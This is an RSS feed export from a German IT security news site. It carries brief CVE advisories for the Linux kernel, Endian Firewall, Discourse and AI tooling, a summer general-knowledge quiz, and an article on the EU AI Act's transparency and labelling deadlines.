<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=named+globs+with+curl%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 19:51:16 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 19:51:16 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=named+globs+with+curl%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=named+globs+with+curl%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[CVE-2026-64813 | JetBrains IntelliJ IDEA up to 2026.1 improper authorization (WID-SEC-2026-2505)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in JetBrains IntelliJ IDEA up to 2026.1. Impacted is an unknown function. Performing a manipulation results in improper authorization.

This vulnerability was named CVE-2026-64813. The attack may be initiated remotely. There is no available...]]></description>
<link>https://tsecurity.de/de/3695599/sicherheitsluecken/cve-2026-64813-jetbrains-intellij-idea-up-to-20261-improper-authorization-wid-sec-2026-2505/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695599/sicherheitsluecken/cve-2026-64813-jetbrains-intellij-idea-up-to-20261-improper-authorization-wid-sec-2026-2505/</guid>
<pubDate>Sun, 26 Jul 2026 14:04:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/jetbrains:intellij_idea">JetBrains IntelliJ IDEA up to 2026.1</a>. Impacted is an unknown function. Performing a manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-64813">CVE-2026-64813</a>. The attack may be initiated remotely. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-64476 | Linux Kernel up to 7.2-rc1 vfio-pci driver vfio_pci.c vfio_pci_dev_set_pm_runtime_get disable_idle_d3 race condition (EUVD-2026-48820)]]></title>
<description><![CDATA[A vulnerability has been found in Linux Kernel up to 7.2-rc1 and classified as critical. This affects the function vfio_pci_dev_set_pm_runtime_get of the file vfio_pci.c of the component vfio-pci driver. Performing a manipulation of the argument disable_idle_d3 results in race condition.

This vu...]]></description>
<link>https://tsecurity.de/de/3695562/sicherheitsluecken/cve-2026-64476-linux-kernel-up-to-72-rc1-vfio-pci-driver-vfiopcic-vfiopcidevsetpmruntimeget-disableidled3-race-condition-euvd-2026-48820/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695562/sicherheitsluecken/cve-2026-64476-linux-kernel-up-to-72-rc1-vfio-pci-driver-vfiopcic-vfiopcidevsetpmruntimeget-disableidled3-race-condition-euvd-2026-48820/</guid>
<pubDate>Sun, 26 Jul 2026 13:38:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 7.2-rc1</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects the function <code>vfio_pci_dev_set_pm_runtime_get</code> of the file <em>vfio_pci.c</em> of the component <em>vfio-pci driver</em>. Performing a manipulation of the argument <em>disable_idle_d3</em> results in race condition.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-64476">CVE-2026-64476</a>. The attack needs to be approached locally. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-64306 | Linux Kernel up to 7.1.3 DRBG drbg_ctr_generate uninitialized variable (Nessus ID 329971)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 7.1.3. It has been rated as very critical. The affected element is the function drbg_ctr_generate of the component DRBG. Performing a manipulation results in use of uninitialized variable.

This vulnerability was named CVE-2026-64306. The attack may...]]></description>
<link>https://tsecurity.de/de/3695516/sicherheitsluecken/cve-2026-64306-linux-kernel-up-to-713-drbg-drbgctrgenerate-uninitialized-variable-nessus-id-329971/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695516/sicherheitsluecken/cve-2026-64306-linux-kernel-up-to-713-drbg-drbgctrgenerate-uninitialized-variable-nessus-id-329971/</guid>
<pubDate>Sun, 26 Jul 2026 12:50:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 7.1.3</a>. It has been rated as <a href="https://vuldb.com/kb/risk">very critical</a>. The affected element is the function <code>drbg_ctr_generate</code> of the component <em>DRBG</em>. Performing a manipulation results in use of uninitialized variable.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-64306">CVE-2026-64306</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-17433 | nanocoai NanoClaw up to 2.0.64 MCP Server Approval chat-sdk-bridge.ts createChatSdkBridge.setup improper authorization (Issue 2761 / EUVD-2026-49048)]]></title>
<description><![CDATA[A vulnerability was found in nanocoai NanoClaw up to 2.0.64. It has been classified as critical. This impacts the function createChatSdkBridge.setup of the file src/channels/chat-sdk-bridge.ts of the component MCP Server Approval. Performing a manipulation results in improper authorization.

This...]]></description>
<link>https://tsecurity.de/de/3695270/sicherheitsluecken/cve-2026-17433-nanocoai-nanoclaw-up-to-2064-mcp-server-approval-chat-sdk-bridgets-createchatsdkbridgesetup-improper-authorization-issue-2761-euvd-2026-49048/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695270/sicherheitsluecken/cve-2026-17433-nanocoai-nanoclaw-up-to-2064-mcp-server-approval-chat-sdk-bridgets-createchatsdkbridgesetup-improper-authorization-issue-2761-euvd-2026-49048/</guid>
<pubDate>Sun, 26 Jul 2026 09:19:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/nanocoai:nanoclaw">nanocoai NanoClaw up to 2.0.64</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This impacts the function <code>createChatSdkBridge.setup</code> of the file <em>src/channels/chat-sdk-bridge.ts</em> of the component <em>MCP Server Approval</em>. Performing a manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-17433">CVE-2026-17433</a>. The attack needs to be approached locally. In addition, an exploit is available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[What links Horrible Histories and Gordon Brown’s neighbour? The bumper summer quiz]]></title>
<description><![CDATA[From award-winning Julies to golfers who were nearly the best, test your knowledge with this bumper summer quiz1 What is now the world’s most populous city, according to the UN?2 Which two Julies won best actress Oscars in consecutive years?3 What was thrown by the goddess Eris at the wedding of ...]]></description>
<link>https://tsecurity.de/de/3695219/it-nachrichten/what-links-horrible-histories-and-gordon-browns-neighbour-the-bumper-summer-quiz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695219/it-nachrichten/what-links-horrible-histories-and-gordon-browns-neighbour-the-bumper-summer-quiz/</guid>
<pubDate>Sun, 26 Jul 2026 08:15:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>From award-winning Julies to golfers who were nearly the best, test your knowledge with this bumper summer quiz</p><p><strong>1</strong> What is now the world’s most populous city, according to the UN?<br><strong>2</strong> Which two Julies won best actress Oscars in consecutive years?<br><strong>3</strong> What was thrown by the goddess Eris at the wedding of Peleus and Thetis?<br><strong>4</strong> Richard Nixon appeared a record 55 times on the cover of what?<br><strong>5</strong> What became Britain’s tallest structure in 1894?<br><strong>6</strong> Mojang Studios in Sweden is renowned for developing which video game?<br><strong>7</strong> Which golfer spent 270 weeks as world No 2, but never reached No 1?<br><strong>8</strong> Which “The” group, named after a Camus novel, went through over 65 members?<br><strong>9</strong> Who is the subject of Alberto Korda’s photograph Guerrillero Heroico?<br><strong>10</strong> What defines an Olimpico goal in football?<br><strong>11</strong> Who initiated the Fridays for Future school strikes?<br><strong>12</strong> Which British dynasty is commemorated by a monument in St Peter’s Basilica?<br><strong>13</strong> What type of souvenir was invented in Vienna in 1900?<br><strong>14</strong> Which Norwegian island gives its name to two shipping forecast areas?<br><strong>15</strong> Which art museum employs a colony of cats to protect it from rodents?<br><strong>16</strong> Millvina Dean, who died in 2009, was the last living survivor of what?<br><strong>What</strong> <strong>links:<br>
  17</strong> Arrival of spring; double portraits; swimming pools; Grand Canyon; Yorkshire landscape?<br><strong>18</strong> Mozart &amp; Franz Süssmayr; Landseer &amp; Millais; F Scott Fitzgerald &amp; Edmund Wilson?<br><strong>19</strong> Cordelia, Goneril &amp; Regan; Imogen; Marina?<br><strong>20</strong> Britannia (1717-1936); Golden Hind (1937-69); St Edward’s Crown (1971-84)?<br><strong>21</strong> Alba white truffles; Pule cheese; Wagyu beef; Yubari King melons?<br><strong>22</strong> Matt Damon; Robert Frost; Bill Gates; Bonnie Raitt; Mark Zuckerberg?<br><strong>23</strong> Horrible Histories; glucose; Gordon Brown’s neighbour; King-Smith’s swine; winter squash?<br><strong>24</strong> Mount Whitney in California and Mulhacén in Andalucía?<br><strong>25</strong> 1991 defence of Baghdad; nacre; UK parliament; Virginia?<br><strong>26</strong> Carrying a double bass; missing a bus; walking two dogs; wearing a cowboy hat; winding a clock?<br><strong>27</strong> 2 (1st); 29 (10th); 541 (100th); 7,919 (1,000th); 104,729 (10,000th)?<br><strong>28</strong> Ant; bull; cuckoo; eagle; shower of gold; swan?<br><strong>29</strong> Zlín, Czechoslovakia; Cohutta, US; Novo Mesto, Yugoslavia?<br><strong>30</strong> Drowned; large bread; pick me up; half cold?</p> <a href="https://www.theguardian.com/games/2026/jul/26/what-links-horrible-histories-and-gordon-browns-neighbour-the-bumper-summer-quiz">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-64520 | Linux Kernel up to 6.18.33/7.0.10 arm_ffa buffer overflow (EUVD-2026-48864)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 6.18.33/7.0.10. It has been rated as very critical. The impacted element is an unknown function of the component arm_ffa. Performing a manipulation results in buffer overflow.

This vulnerability was named CVE-2026-64520. The attack may be initiated...]]></description>
<link>https://tsecurity.de/de/3695118/sicherheitsluecken/cve-2026-64520-linux-kernel-up-to-618337010-armffa-buffer-overflow-euvd-2026-48864/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695118/sicherheitsluecken/cve-2026-64520-linux-kernel-up-to-618337010-armffa-buffer-overflow-euvd-2026-48864/</guid>
<pubDate>Sun, 26 Jul 2026 06:36:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.18.33/7.0.10</a>. It has been rated as <a href="https://vuldb.com/kb/risk">very critical</a>. The impacted element is an unknown function of the component <em>arm_ffa</em>. Performing a manipulation results in buffer overflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-64520">CVE-2026-64520</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-64504 | Linux Kernel up to 7.2-rc2 BMC150 Accelerometer Driver __bmc150_accel_fifo_flush stack-based overflow (EUVD-2026-48848)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 7.2-rc2. It has been declared as very critical. This vulnerability affects the function __bmc150_accel_fifo_flush of the component BMC150 Accelerometer Driver. The manipulation results in stack-based buffer overflow.

This vulnerability was named CV...]]></description>
<link>https://tsecurity.de/de/3695082/sicherheitsluecken/cve-2026-64504-linux-kernel-up-to-72-rc2-bmc150-accelerometer-driver-bmc150accelfifoflush-stack-based-overflow-euvd-2026-48848/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695082/sicherheitsluecken/cve-2026-64504-linux-kernel-up-to-72-rc2-bmc150-accelerometer-driver-bmc150accelfifoflush-stack-based-overflow-euvd-2026-48848/</guid>
<pubDate>Sun, 26 Jul 2026 06:36:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 7.2-rc2</a>. It has been declared as <a href="https://vuldb.com/kb/risk">very critical</a>. This vulnerability affects the function <code>__bmc150_accel_fifo_flush</code> of the component <em>BMC150 Accelerometer Driver</em>. The manipulation results in stack-based buffer overflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-64504">CVE-2026-64504</a>. The attack may be performed from remote. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-34797 | Endian Firewall 3.3.25 Regular Expression /cgi-bin/logs_smtp.cgi open Date os command injection]]></title>
<description><![CDATA[A vulnerability has been found in Endian Firewall 3.3.25 and classified as critical. Affected is the function Open of the file /cgi-bin/logs_smtp.cgi of the component Regular Expression Handler. Performing a manipulation of the argument Date results in os command injection.

This vulnerability wa...]]></description>
<link>https://tsecurity.de/de/3695060/sicherheitsluecken/cve-2026-34797-endian-firewall-3325-regular-expression-cgi-binlogssmtpcgi-open-date-os-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695060/sicherheitsluecken/cve-2026-34797-endian-firewall-3325-regular-expression-cgi-binlogssmtpcgi-open-date-os-command-injection/</guid>
<pubDate>Sun, 26 Jul 2026 06:36:10 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/endian:firewall">Endian Firewall 3.3.25</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is the function <code>Open</code> of the file <em>/cgi-bin/logs_smtp.cgi</em> of the component <em>Regular Expression Handler</em>. Performing a manipulation of the argument <em>Date</em> results in os command injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-34797">CVE-2026-34797</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-34797 | Endian Firewall 3.3.25 Regular Expression /cgi-bin/logs_smtp.cgi open Date os command injection]]></title>
<description><![CDATA[A vulnerability has been found in Endian Firewall 3.3.25 and classified as critical. Affected is the function Open of the file /cgi-bin/logs_smtp.cgi of the component Regular Expression Handler. Performing a manipulation of the argument Date results in os command injection.

This vulnerability wa...]]></description>
<link>https://tsecurity.de/de/3695061/sicherheitsluecken/cve-2026-34797-endian-firewall-3325-regular-expression-cgi-binlogssmtpcgi-open-date-os-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695061/sicherheitsluecken/cve-2026-34797-endian-firewall-3325-regular-expression-cgi-binlogssmtpcgi-open-date-os-command-injection/</guid>
<pubDate>Sun, 26 Jul 2026 06:36:10 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/endian:firewall">Endian Firewall 3.3.25</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is the function <code>Open</code> of the file <em>/cgi-bin/logs_smtp.cgi</em> of the component <em>Regular Expression Handler</em>. Performing a manipulation of the argument <em>Date</em> results in os command injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-34797">CVE-2026-34797</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-34813 | Endian Firewall 3.3.25 Parameter /cgi-bin/proxyuser.cgi User cross site scripting]]></title>
<description><![CDATA[A vulnerability was found in Endian Firewall 3.3.25 and classified as problematic. This vulnerability affects unknown code of the file /cgi-bin/proxyuser.cgi of the component Parameter Handler. The manipulation of the argument User results in cross site scripting.

This vulnerability was named CV...]]></description>
<link>https://tsecurity.de/de/3695040/sicherheitsluecken/cve-2026-34813-endian-firewall-3325-parameter-cgi-binproxyusercgi-user-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695040/sicherheitsluecken/cve-2026-34813-endian-firewall-3325-parameter-cgi-binproxyusercgi-user-cross-site-scripting/</guid>
<pubDate>Sun, 26 Jul 2026 06:36:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/endian:firewall">Endian Firewall 3.3.25</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects unknown code of the file <em>/cgi-bin/proxyuser.cgi</em> of the component <em>Parameter Handler</em>. The manipulation of the argument <em>User</em> results in cross site scripting.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-34813">CVE-2026-34813</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-64490 | Linux Kernel up to 6.12.95/6.18.38/7.1.3 ALSA virtsnd_kctl_parse_cfg out-of-bounds (EUVD-2026-48834)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 6.12.95/6.18.38/7.1.3. It has been classified as very critical. Affected is the function virtsnd_kctl_parse_cfg of the component ALSA. Performing a manipulation results in out-of-bounds read.

This vulnerability was named CVE-2026-64490. The attack ...]]></description>
<link>https://tsecurity.de/de/3695043/sicherheitsluecken/cve-2026-64490-linux-kernel-up-to-6129561838713-alsa-virtsndkctlparsecfg-out-of-bounds-euvd-2026-48834/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695043/sicherheitsluecken/cve-2026-64490-linux-kernel-up-to-6129561838713-alsa-virtsndkctlparsecfg-out-of-bounds-euvd-2026-48834/</guid>
<pubDate>Sun, 26 Jul 2026 06:36:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.12.95/6.18.38/7.1.3</a>. It has been classified as <a href="https://vuldb.com/kb/risk">very critical</a>. Affected is the function <code>virtsnd_kctl_parse_cfg</code> of the component <em>ALSA</em>. Performing a manipulation results in out-of-bounds read.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-64490">CVE-2026-64490</a>. The attack needs to be approached locally. There is no available exploit.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32113 | Discourse up to 2026.1.2/2026.2.1 sso_destination_url redirect]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Discourse up to 2026.1.2/2026.2.1. This issue affects some unknown processing. The manipulation of the argument sso_destination_url results in open redirect.

This vulnerability was named CVE-2026-32113. The attack may be performe...]]></description>
<link>https://tsecurity.de/de/3694912/sicherheitsluecken/cve-2026-32113-discourse-up-to-202612202621-ssodestinationurl-redirect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694912/sicherheitsluecken/cve-2026-32113-discourse-up-to-202612202621-ssodestinationurl-redirect/</guid>
<pubDate>Sat, 25 Jul 2026 22:22:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/discourse">Discourse up to 2026.1.2/2026.2.1</a>. This issue affects some unknown processing. The manipulation of the argument <em>sso_destination_url</em> results in open redirect.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-32113">CVE-2026-32113</a>. The attack may be performed from remote. There is no available exploit.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-66004 | ahujasid blender-mcp download_polyhaven_asset path traversal (EUVD-2026-48604)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in ahujasid blender-mcp. The affected element is the function download_polyhaven_asset. The manipulation results in path traversal.

This vulnerability was named CVE-2026-66004. The attack may be performed from remote. There is no available explo...]]></description>
<link>https://tsecurity.de/de/3694809/sicherheitsluecken/cve-2026-66004-ahujasid-blender-mcp-downloadpolyhavenasset-path-traversal-euvd-2026-48604/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694809/sicherheitsluecken/cve-2026-66004-ahujasid-blender-mcp-downloadpolyhavenasset-path-traversal-euvd-2026-48604/</guid>
<pubDate>Sat, 25 Jul 2026 20:05:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/ahujasid:blender-mcp">ahujasid blender-mcp</a>. The affected element is the function <code>download_polyhaven_asset</code>. The manipulation results in path traversal.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-66004">CVE-2026-66004</a>. The attack may be performed from remote. There is no available exploit.

A patch should be applied to remediate this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3694779/ai-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694779/ai-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



